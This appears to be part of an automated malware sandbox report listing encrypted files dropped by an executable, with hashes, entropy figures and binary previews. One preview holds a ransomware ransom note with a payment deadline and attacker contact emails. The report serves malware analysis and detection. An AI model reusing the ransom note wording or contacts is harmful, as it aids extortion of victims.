                                                                                                                                            MD5:26DAB35D3F11D249714BDBFE324C2A7B
                                                                                                                                            SHA1:52473A75988BEBCCC325B57DB66B793250FAF71A
                                                                                                                                            SHA-256:ABFECB44F5F5384E902378F96E1D2C6DAF7A858BA18320621D6FD03454AACE22
                                                                                                                                            SHA-512:E086E69245A41D1962DFACEC18050D06EE129E5BDF889F9FF16B3384C23E4FC8F67CA94EF60ECA10C7DAAE6795FA41F8156BF69428845A1429DC9799BCE78DB8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ZZ..4.j...(y..$.}F..9.%.F.De.c..+........8...ak....#`...#.h~.q..R.1.Xk.5l.iJm.@.......w.Z'...V.....$..."O2v/....`.H......,..../.0YS..ic..?L67....UwCb,...=.S>...&.}.u.l...j... .D.Y....<.g.2Qn+...+..s....ST.$..~.......%.,...........rn.enjU.*.K.A^ ...8z..tk.I..{=,O.......[..g.........i..... -S.`6,..7...(*.0pd../..zj.z.Z.A..V.p}.i...z....Z.U.;....+.p.....M....}C..{...l..P..e..}\^.@A...&.....FZi_;M..a.O=.....|S...@..A*...B?a=...i..CPu..E[..''...M,UI......s..f..C*....n..t....,..k..xP.p.._n..^.<.1.!.^...E....._Lx%...|...o....K.=...p...6..DV..B..WQ.n........9....T....i.J........1w..c.k..=.xO./....n`q..Wn}......].k..h.=.eO..U._......M.a.z...j..}.!$H-.*.,p.XpKg._ .#O]UF&=.....~i..W'.:.y..[s5...~.&.9).uv..0. .Yx8....M}.G..}.2)...*ZXJ<..%.......>.l.J....e..bS&..........2Si....l$....[.O..5]...c?j{$..'5.4.'d..f.T..."..m..'..v...u.^..h..J.%..,./.g. ..q.gs.(.S..X..>.L..b%E...Os.54. . ..lRc ..5.......K.g.Zw.2....J.$i}.[.w......EF.?l..Tr....kp..w..ZIo
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5898
                                                                                                                                            Entropy (8bit):7.442185798143654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:w6ya4+j03/mcsfrL+PWmStPzIAOwEV9AjvKhPydRx+OcVDxY9:/hCBILmGbF4Ajvsyd3+OyxY9
                                                                                                                                            MD5:26DAB35D3F11D249714BDBFE324C2A7B
                                                                                                                                            SHA1:52473A75988BEBCCC325B57DB66B793250FAF71A
                                                                                                                                            SHA-256:ABFECB44F5F5384E902378F96E1D2C6DAF7A858BA18320621D6FD03454AACE22
                                                                                                                                            SHA-512:E086E69245A41D1962DFACEC18050D06EE129E5BDF889F9FF16B3384C23E4FC8F67CA94EF60ECA10C7DAAE6795FA41F8156BF69428845A1429DC9799BCE78DB8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ZZ..4.j...(y..$.}F..9.%.F.De.c..+........8...ak....#`...#.h~.q..R.1.Xk.5l.iJm.@.......w.Z'...V.....$..."O2v/....`.H......,..../.0YS..ic..?L67....UwCb,...=.S>...&.}.u.l...j... .D.Y....<.g.2Qn+...+..s....ST.$..~.......%.,...........rn.enjU.*.K.A^ ...8z..tk.I..{=,O.......[..g.........i..... -S.`6,..7...(*.0pd../..zj.z.Z.A..V.p}.i...z....Z.U.;....+.p.....M....}C..{...l..P..e..}\^.@A...&.....FZi_;M..a.O=.....|S...@..A*...B?a=...i..CPu..E[..''...M,UI......s..f..C*....n..t....,..k..xP.p.._n..^.<.1.!.^...E....._Lx%...|...o....K.=...p...6..DV..B..WQ.n........9....T....i.J........1w..c.k..=.xO./....n`q..Wn}......].k..h.=.eO..U._......M.a.z...j..}.!$H-.*.,p.XpKg._ .#O]UF&=.....~i..W'.:.y..[s5...~.&.9).uv..0. .Yx8....M}.G..}.2)...*ZXJ<..%.......>.l.J....e..bS&..........2Si....l$....[.O..5]...c?j{$..'5.4.'d..f.T..."..m..'..v...u.^..h..J.%..,./.g. ..q.gs.(.S..X..>.L..b%E...Os.54. . ..lRc ..5.......K.g.Zw.2....J.$i}.[.w......EF.?l..Tr....kp..w..ZIo
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5898
                                                                                                                                            Entropy (8bit):7.442185798143654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:w6ya4+j03/mcsfrL+PWmStPzIAOwEV9AjvKhPydRx+OcVDxY9:/hCBILmGbF4Ajvsyd3+OyxY9
                                                                                                                                            MD5:26DAB35D3F11D249714BDBFE324C2A7B
                                                                                                                                            SHA1:52473A75988BEBCCC325B57DB66B793250FAF71A
                                                                                                                                            SHA-256:ABFECB44F5F5384E902378F96E1D2C6DAF7A858BA18320621D6FD03454AACE22
                                                                                                                                            SHA-512:E086E69245A41D1962DFACEC18050D06EE129E5BDF889F9FF16B3384C23E4FC8F67CA94EF60ECA10C7DAAE6795FA41F8156BF69428845A1429DC9799BCE78DB8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ZZ..4.j...(y..$.}F..9.%.F.De.c..+........8...ak....#`...#.h~.q..R.1.Xk.5l.iJm.@.......w.Z'...V.....$..."O2v/....`.H......,..../.0YS..ic..?L67....UwCb,...=.S>...&.}.u.l...j... .D.Y....<.g.2Qn+...+..s....ST.$..~.......%.,...........rn.enjU.*.K.A^ ...8z..tk.I..{=,O.......[..g.........i..... -S.`6,..7...(*.0pd../..zj.z.Z.A..V.p}.i...z....Z.U.;....+.p.....M....}C..{...l..P..e..}\^.@A...&.....FZi_;M..a.O=.....|S...@..A*...B?a=...i..CPu..E[..''...M,UI......s..f..C*....n..t....,..k..xP.p.._n..^.<.1.!.^...E....._Lx%...|...o....K.=...p...6..DV..B..WQ.n........9....T....i.J........1w..c.k..=.xO./....n`q..Wn}......].k..h.=.eO..U._......M.a.z...j..}.!$H-.*.,p.XpKg._ .#O]UF&=.....~i..W'.:.y..[s5...~.&.9).uv..0. .Yx8....M}.G..}.2)...*ZXJ<..%.......>.l.J....e..bS&..........2Si....l$....[.O..5]...c?j{$..'5.4.'d..f.T..."..m..'..v...u.^..h..J.%..,./.g. ..q.gs.(.S..X..>.L..b%E...Os.54. . ..lRc ..5.......K.g.Zw.2....J.$i}.[.w......EF.?l..Tr....kp..w..ZIo
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.874365038917981
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DYQnOsNAJ4wk745GhIWEgjEqJJkcG17pr0jnSaJOReiNHBQsbbt7R49x:DFOsNaC4Mmgj/J8Cz9JTSH5fJRkx
                                                                                                                                            MD5:292FCAFBE4A0082D61A6BB07F06F0898
                                                                                                                                            SHA1:4F14BFEAF67300DD2F6B30B739DAC1457D80DB1D
                                                                                                                                            SHA-256:BDB052640E7729228A18D725E0DE132371ABCCAA8AB3B94385363DB50ED9F838
                                                                                                                                            SHA-512:82FD26F95F4C4F397DFF2CF528ACDC7E9BAF5A1B6BA4958965114FBFDF75EF77A4D7075AB4C6D53B371BE7DDC3E6C46B605F91893FE4EEF9ABE17E01A277E893
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.M......../n.?...A.+I.%.:.?8......<$NWZI..Kn...{...7.MF....;9..n;.%Y..E.?..a.-..>E.....p.[.+.Dz...~.3..dV....*..^.u...w+.......V$..Q.p`/....._.+.L..8.1Od..#...Xb.......u....uS.@..8.ttYB.w<..Bh..yL.......W... .K......3...i".&...~...`..E...V....R.?.T.w.oz.....b.. .D.)7!m0.3.I."8.".5T.~zix..z......."..\;.G..q......b.f.Va\.x..@.....C..HZ.-x.DW$Z7.._........./..s...>.m...,..^^.O.". ....q..|..$.....V..>.f...3o`.)%s.&p....5..E.p.,.?.[...`.B..y.Q@........z.2}..%..4+T....^......}m..o..vQ....[..t...C;....J....(....@":_...k.t,d.....(Gt.m5se~......F.SS...L7....o*..n.. &..A..:.8.....$Y....Vip..Z.9..G...H.n./.C.;.S.9bo......ij..dU..<..9J4.M.P.bow.[...e.4v*.:.k.D:.....y}.j.H......4.hD.1/f-.....j.:....R.g.U..nq.eF....S.|...&c1.^...J7p.Wh.....}[.O....t#D#.+.....+.......=_F}-......+.#.Y.V..:D..@.L.U..O..|......dG.l..e1!D.......-2..K.x/......)...'+.....-..l^T*@.|..ET.Q......./lae+.....Rb.-.Y.`..f...B.;....r*b...[z...}...\{...;.q*v.".%P....tr.<...0k2.JL..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.874365038917981
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DYQnOsNAJ4wk745GhIWEgjEqJJkcG17pr0jnSaJOReiNHBQsbbt7R49x:DFOsNaC4Mmgj/J8Cz9JTSH5fJRkx
                                                                                                                                            MD5:292FCAFBE4A0082D61A6BB07F06F0898
                                                                                                                                            SHA1:4F14BFEAF67300DD2F6B30B739DAC1457D80DB1D
                                                                                                                                            SHA-256:BDB052640E7729228A18D725E0DE132371ABCCAA8AB3B94385363DB50ED9F838
                                                                                                                                            SHA-512:82FD26F95F4C4F397DFF2CF528ACDC7E9BAF5A1B6BA4958965114FBFDF75EF77A4D7075AB4C6D53B371BE7DDC3E6C46B605F91893FE4EEF9ABE17E01A277E893
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.M......../n.?...A.+I.%.:.?8......<$NWZI..Kn...{...7.MF....;9..n;.%Y..E.?..a.-..>E.....p.[.+.Dz...~.3..dV....*..^.u...w+.......V$..Q.p`/....._.+.L..8.1Od..#...Xb.......u....uS.@..8.ttYB.w<..Bh..yL.......W... .K......3...i".&...~...`..E...V....R.?.T.w.oz.....b.. .D.)7!m0.3.I."8.".5T.~zix..z......."..\;.G..q......b.f.Va\.x..@.....C..HZ.-x.DW$Z7.._........./..s...>.m...,..^^.O.". ....q..|..$.....V..>.f...3o`.)%s.&p....5..E.p.,.?.[...`.B..y.Q@........z.2}..%..4+T....^......}m..o..vQ....[..t...C;....J....(....@":_...k.t,d.....(Gt.m5se~......F.SS...L7....o*..n.. &..A..:.8.....$Y....Vip..Z.9..G...H.n./.C.;.S.9bo......ij..dU..<..9J4.M.P.bow.[...e.4v*.:.k.D:.....y}.j.H......4.hD.1/f-.....j.:....R.g.U..nq.eF....S.|...&c1.^...J7p.Wh.....}[.O....t#D#.+.....+.......=_F}-......+.#.Y.V..:D..@.L.U..O..|......dG.l..e1!D.......-2..K.x/......)...'+.....-..l^T*@.|..ET.Q......./lae+.....Rb.-.Y.`..f...B.;....r*b...[z...}...\{...;.q*v.".%P....tr.<...0k2.JL..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.857510175505365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Bdj+YIOh0atF3abXdBZl4knTWpR0KHjMjJ5jCIijLsKQ8Y:BdjntrtFIXnnTWpR5HYd5jVKw
                                                                                                                                            MD5:60F3BD775865F53F338F245852DAE6B6
                                                                                                                                            SHA1:118203A14CF35150C84C2CF69E99C419AA05D7F7
                                                                                                                                            SHA-256:41C7846917B448166085A5FE60E3CB0D323AB1D6DD4D653113943E291BABDDDC
                                                                                                                                            SHA-512:739E948F867FEFA647A0E759E7401F7B28D28F1A6F28145F9F3BC3328B48F3D9D94398B0FFE76C1840B48AC1489C94E793F7588888B8808ED2CC27B0A3A86124
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..>...H...r..Y...;...~S.QS9Y.../.B.b..:G..8.....N..x.[e.5i.OP|...u>.S.3.GX.3.....B../_....!.C.....:..Ij%..V.&u......._7.SM....z.E.h$.c....1t2G.../......)..x.p...tE..a..0u?68.2...*...l3....._.b...........y7.....1.K....n,...T.xy.m./.Q.....j....|...i.C..m...G....%....T.S.1..F.a..djl.Y.=..0...O....[R.V.pRq..+........*...Oi.l..A....Ra..:v2=R..m.6e;K."'|...SV.!../...i.#.^C..m+J.A..$....]....B.]...xd..Nd|...^..]....nj..eP...~...P.+."...r..V.....U\..|.~0H.J..gW.z...p<.q..A.2...t.!...._E{...P..0.p>..o.2f;..^...:...zqt...JC[Dw....T.K..xe......di.u".A.n\....i.L.,...s..4...\F...q.[.p...Qq..../o@...].}N...Mo..b..._/3...p....f.nB..Q...6q.t...[..{...y..U..H..`..%M.<...2Q....<+....e...4.?.. v.s.q.lp...=.~......;..6...S[..H....7.....t....*...v.et......%...w6J.V.y{.@.%..P.,UT...u.c..o...7.J),g..k.L.H.M......-..]..J.~...."T.%...,x.%.rt..{.w..q...............s..:..g.G).R..dU.[#../..O.E.....O.J...SQ.L.2.2.p.5..`.m..5....z.Y:...4..2.z..1y.......<
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.857510175505365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Bdj+YIOh0atF3abXdBZl4knTWpR0KHjMjJ5jCIijLsKQ8Y:BdjntrtFIXnnTWpR5HYd5jVKw
                                                                                                                                            MD5:60F3BD775865F53F338F245852DAE6B6
                                                                                                                                            SHA1:118203A14CF35150C84C2CF69E99C419AA05D7F7
                                                                                                                                            SHA-256:41C7846917B448166085A5FE60E3CB0D323AB1D6DD4D653113943E291BABDDDC
                                                                                                                                            SHA-512:739E948F867FEFA647A0E759E7401F7B28D28F1A6F28145F9F3BC3328B48F3D9D94398B0FFE76C1840B48AC1489C94E793F7588888B8808ED2CC27B0A3A86124
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..>...H...r..Y...;...~S.QS9Y.../.B.b..:G..8.....N..x.[e.5i.OP|...u>.S.3.GX.3.....B../_....!.C.....:..Ij%..V.&u......._7.SM....z.E.h$.c....1t2G.../......)..x.p...tE..a..0u?68.2...*...l3....._.b...........y7.....1.K....n,...T.xy.m./.Q.....j....|...i.C..m...G....%....T.S.1..F.a..djl.Y.=..0...O....[R.V.pRq..+........*...Oi.l..A....Ra..:v2=R..m.6e;K."'|...SV.!../...i.#.^C..m+J.A..$....]....B.]...xd..Nd|...^..]....nj..eP...~...P.+."...r..V.....U\..|.~0H.J..gW.z...p<.q..A.2...t.!...._E{...P..0.p>..o.2f;..^...:...zqt...JC[Dw....T.K..xe......di.u".A.n\....i.L.,...s..4...\F...q.[.p...Qq..../o@...].}N...Mo..b..._/3...p....f.nB..Q...6q.t...[..{...y..U..H..`..%M.<...2Q....<+....e...4.?.. v.s.q.lp...=.~......;..6...S[..H....7.....t....*...v.et......%...w6J.V.y{.@.%..P.,UT...u.c..o...7.J),g..k.L.H.M......-..]..J.~...."T.%...,x.%.rt..{.w..q...............s..:..g.G).R..dU.[#../..O.E.....O.J...SQ.L.2.2.p.5..`.m..5....z.Y:...4..2.z..1y.......<
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866245186856718
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:dUHEnlnutRwpNeUzRxo4ib+zCMYMdkh1SefuZC3gMyUjNSMC89uqQxYdq56T:dMEwI5zR64i3xrhkYuZC3+rvgxiYdhT
                                                                                                                                            MD5:21E0FA3C6F702BB022A5E7FE18889D10
                                                                                                                                            SHA1:056AFA1D67EED58036702EE5C6015DC409568AE4
                                                                                                                                            SHA-256:D5EB055500436B12AF54E4E7372856AA845040E2D80E2C3A2C7E5005E3416FA3
                                                                                                                                            SHA-512:99BED1F6BDE9317E5B26E20B54501D07FA14A94A99CD3A92299289A72ECE24F01AB9C5142E8BDDE5FAD626EC345138F99AA186D6B9C61C7D7D25FFE6152B3559
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...D(..Q.!-.....O.m.!...v..>....h.by].bYLe...3 {H.....,.*.I..LK...*..(.s.....'..X.lhU.....Z......m..5....._V"...b$N...I....&7.;.).$...0M-./.x....B..3..7.U>..S.S.\..y...,y.PU..x..I6yL...g{.S.G..N..f...l.uU...%.Z...9.....}/*.J.@.!t5.*3....&.^{>..BXF..d>...'sG...4.2l.q...;.LM..O*.)....R....>g..fS....c5-..~s ..H....g.E.3xn.:Z\.,}...(=+1...q...wp~..%...u+.k .n!..0. 4xpa..^.n1.%.j4...c..3..*...(........%...`R....9.......Y..!m..7.......o..b..ta.$<W..&*.nt...g.L..Ti....j..2H+"....[K..a.t...^hU.0..9..~.]J..T.7....A.H/.U.K.f.Aq$]/.S.Fe...._....!.......:a.Q.T...LH?.#...JC......B.F.Wl.......D.....+j>1n..5.g.V.zP...9..*h[.p>t.....r2...* .@ w'.H...$?.]..).........32..6(6m1.I.0G.`"..a..=.ai...|.+..#....R.@-...:......~...{.vN.....1...IO5...Q. .ZU|.......A.Y....8..!...a^;u.f`.4..M.....c...C....0....F.H.S.'.).F..h..c.0.V-..u...N....k$..c.].?......[...).....hG.pv..:e&..$a...X8*....W...z.......8...Sl..!..f4...~.....t....Q.(b.v..f.u.cd.!tc.b.6..B.0......Br..#Y:7..o.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866245186856718
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:dUHEnlnutRwpNeUzRxo4ib+zCMYMdkh1SefuZC3gMyUjNSMC89uqQxYdq56T:dMEwI5zR64i3xrhkYuZC3+rvgxiYdhT
                                                                                                                                            MD5:21E0FA3C6F702BB022A5E7FE18889D10
                                                                                                                                            SHA1:056AFA1D67EED58036702EE5C6015DC409568AE4
                                                                                                                                            SHA-256:D5EB055500436B12AF54E4E7372856AA845040E2D80E2C3A2C7E5005E3416FA3
                                                                                                                                            SHA-512:99BED1F6BDE9317E5B26E20B54501D07FA14A94A99CD3A92299289A72ECE24F01AB9C5142E8BDDE5FAD626EC345138F99AA186D6B9C61C7D7D25FFE6152B3559
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...D(..Q.!-.....O.m.!...v..>....h.by].bYLe...3 {H.....,.*.I..LK...*..(.s.....'..X.lhU.....Z......m..5....._V"...b$N...I....&7.;.).$...0M-./.x....B..3..7.U>..S.S.\..y...,y.PU..x..I6yL...g{.S.G..N..f...l.uU...%.Z...9.....}/*.J.@.!t5.*3....&.^{>..BXF..d>...'sG...4.2l.q...;.LM..O*.)....R....>g..fS....c5-..~s ..H....g.E.3xn.:Z\.,}...(=+1...q...wp~..%...u+.k .n!..0. 4xpa..^.n1.%.j4...c..3..*...(........%...`R....9.......Y..!m..7.......o..b..ta.$<W..&*.nt...g.L..Ti....j..2H+"....[K..a.t...^hU.0..9..~.]J..T.7....A.H/.U.K.f.Aq$]/.S.Fe...._....!.......:a.Q.T...LH?.#...JC......B.F.Wl.......D.....+j>1n..5.g.V.zP...9..*h[.p>t.....r2...* .@ w'.H...$?.]..).........32..6(6m1.I.0G.`"..a..=.ai...|.+..#....R.@-...:......~...{.vN.....1...IO5...Q. .ZU|.......A.Y....8..!...a^;u.f`.4..M.....c...C....0....F.H.S.'.).F..h..c.0.V-..u...N....k$..c.].?......[...).....hG.pv..:e&..$a...X8*....W...z.......8...Sl..!..f4...~.....t....Q.(b.v..f.u.cd.!tc.b.6..B.0......Br..#Y:7..o.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.851996988863703
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MzZfcvfbBLafSJ02tjt6fQdbbxeCiQvfX1hZ69hr9loxBccZQ653njoW8qqchP2:Lvfb5SqhtjMabbICigfX14hrUXZQ6530
                                                                                                                                            MD5:48DA77810B1FA6AAB6A9AFB1086BBA98
                                                                                                                                            SHA1:4DAD95A5EBCDE12285FB85081C7AA10D324BA065
                                                                                                                                            SHA-256:D225889676A3DDA6D92F47B60A95EAAC7AFACB4C0BA88204E75535664616FD2E
                                                                                                                                            SHA-512:1DF5D1C4122A6F9152291D8900F3C18EE319CE08DA8F80548BB73DCF39A886ECBAB3304EAFC1DF2562AF6B6FB13FFB6B2456E824714E8BD493EADD8C52A87AA6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#..D.5.&.4......p..<.lB....8iV......^%..]..R7.....<!+$..7..NU....4....x....K.CoX ......T.O....6=.YN}..i$tnG?!..0<.y..R.....V.D.."d..K..a...yn.k......X...1..q.^ H$}W..].w>.........q. d...X.f.r..#1.DN....q....~...../...#?$.$....z....7s.X>..v..3...6(.u.......F..V.K4..._.'.A..*&.C..`...<...N..g.%...'.4.....k...:b.Gv.*{.Kvw.j.L.og.k..]!+1W.b.{2..[..r.HYTH......7E.....7..W.1PN...PL...<.......7...5..S.........d..|..nc..3$(0.9xH&.V~....O...6^.....*...M..0....P.......*.[."<3..i..[F...z....{..c.....8.H....)...D...Y=.1.g.>..h...|..c#.h.)..j3.A...'1Bv..*.Kd..-.....9.f.gr.[.y..QP..{.P%..y{..\H.8X_...!.....0...ON..,...!..9.m{..+?. .l)..].4..o~,......j.Se}9&`........g2...*>.....p.g?...!?.`V.$..;W.O[...r....'...^..e.;...@....f>...;....y...Z.u}'{S......[=..<./IV..!1.f.qQ.?....Hl.0.-......]kM..O.k....}!...j..l.t.,..g.w...X.(.[.w"......J..h.T.U-UhB.y.&.Y./...g...me.H....C......R{a.}.6>=.+C.u.\.!.....f.X...`{.......^..2..j..f.'ZkW.....~....7.$..%..y....b
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.851996988863703
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MzZfcvfbBLafSJ02tjt6fQdbbxeCiQvfX1hZ69hr9loxBccZQ653njoW8qqchP2:Lvfb5SqhtjMabbICigfX14hrUXZQ6530
                                                                                                                                            MD5:48DA77810B1FA6AAB6A9AFB1086BBA98
                                                                                                                                            SHA1:4DAD95A5EBCDE12285FB85081C7AA10D324BA065
                                                                                                                                            SHA-256:D225889676A3DDA6D92F47B60A95EAAC7AFACB4C0BA88204E75535664616FD2E
                                                                                                                                            SHA-512:1DF5D1C4122A6F9152291D8900F3C18EE319CE08DA8F80548BB73DCF39A886ECBAB3304EAFC1DF2562AF6B6FB13FFB6B2456E824714E8BD493EADD8C52A87AA6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#..D.5.&.4......p..<.lB....8iV......^%..]..R7.....<!+$..7..NU....4....x....K.CoX ......T.O....6=.YN}..i$tnG?!..0<.y..R.....V.D.."d..K..a...yn.k......X...1..q.^ H$}W..].w>.........q. d...X.f.r..#1.DN....q....~...../...#?$.$....z....7s.X>..v..3...6(.u.......F..V.K4..._.'.A..*&.C..`...<...N..g.%...'.4.....k...:b.Gv.*{.Kvw.j.L.og.k..]!+1W.b.{2..[..r.HYTH......7E.....7..W.1PN...PL...<.......7...5..S.........d..|..nc..3$(0.9xH&.V~....O...6^.....*...M..0....P.......*.[."<3..i..[F...z....{..c.....8.H....)...D...Y=.1.g.>..h...|..c#.h.)..j3.A...'1Bv..*.Kd..-.....9.f.gr.[.y..QP..{.P%..y{..\H.8X_...!.....0...ON..,...!..9.m{..+?. .l)..].4..o~,......j.Se}9&`........g2...*>.....p.g?...!?.`V.$..;W.O[...r....'...^..e.;...@....f>...;....y...Z.u}'{S......[=..<./IV..!1.f.qQ.?....Hl.0.-......]kM..O.k....}!...j..l.t.,..g.w...X.(.[.w"......J..h.T.U-UhB.y.&.Y./...g...me.H....C......R{a.}.6>=.+C.u.\.!.....f.X...`{.......^..2..j..f.'ZkW.....~....7.$..%..y....b
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855554193623334
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:CwvEeZ7WQaPYQw+wpe9MsA1MrfM45bmZ5zIis68dGHxmhNcjzZlj5vNegqFmSAmO:Cwx7WQsY/peKfarf/hUIistdixvjtljR
                                                                                                                                            MD5:A53473CC182E5ADC8C490FE16C67115D
                                                                                                                                            SHA1:555B71D45AD4AA638D66CA08AB30AA429137E69A
                                                                                                                                            SHA-256:67332F99DF7B4474F6BEF14BF0D0B209A2A65E0739AC54EB43BE6EBFBBB65660
                                                                                                                                            SHA-512:CE13300DEC056D89C44D226EA320F9BA5AF11D73C1F597E8FD2E4A1C8EF478C0436D27512FBB241E523A02E00B6696B0C0D814F2D250EEC86F71B4C17A520410
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...'`...#K.zo..*...w......;^....!...B>n2.j..V...D......o<].q.).BmM.Y....my..(4.y....z.1.....W4.B...gc..".k.....XQ...x\......'...V`...PY.....b[4c.D:.._..J..]..S..qU..i...U1.<.j.=.M4.C=g...h..:....%sT.7....W..`g..q.j..t......".}u...X.*F{.QF!....Pu.1..nG..u..^F+.T.....-....#..^3...j.5 ...dt.......>o.cO.]3....J.^..q.....5.&...L..+.Q$....^u...j......w._G...j.Z.%f..S.C....j.-d.R.!r).g.".s...6bh..y...y....S.r.{.&...8.....=yzqh....t......S.....(.1.....a.......Y..MQ..o.=...n...d.......cT...}....~.....8A.O.f$...T+).8..\.B.....m...&K,..|1.Na.Ci.....::..F..\.[..wB.w.......x.".$>.{......}.s3....z_...G\..).l}.e............4.N...\QX..T.M/...".q.....s.|.V.....D9.>.. ..w*... Q.r}DZ@..a.%......&:;..;....5:6....MB.s.a>Q8....IH...r...R...Uo .th.%...".RS..K.........Qoa.&e.M..F.9.l....Qw......c.....].m...*..g:_..'.7k....,.lZ'../5....q.T.yBo...*.&..E....L E.g.]..T...f.!.:..*.....*b+.E.(.y....k.H&u.r.....7.RZs.5.}..3.......Dc?.#?F-_...mA7....B.sIa.......X..m
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855554193623334
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:CwvEeZ7WQaPYQw+wpe9MsA1MrfM45bmZ5zIis68dGHxmhNcjzZlj5vNegqFmSAmO:Cwx7WQsY/peKfarf/hUIistdixvjtljR
                                                                                                                                            MD5:A53473CC182E5ADC8C490FE16C67115D
                                                                                                                                            SHA1:555B71D45AD4AA638D66CA08AB30AA429137E69A
                                                                                                                                            SHA-256:67332F99DF7B4474F6BEF14BF0D0B209A2A65E0739AC54EB43BE6EBFBBB65660
                                                                                                                                            SHA-512:CE13300DEC056D89C44D226EA320F9BA5AF11D73C1F597E8FD2E4A1C8EF478C0436D27512FBB241E523A02E00B6696B0C0D814F2D250EEC86F71B4C17A520410
                                                                                                                                            Malicious:false
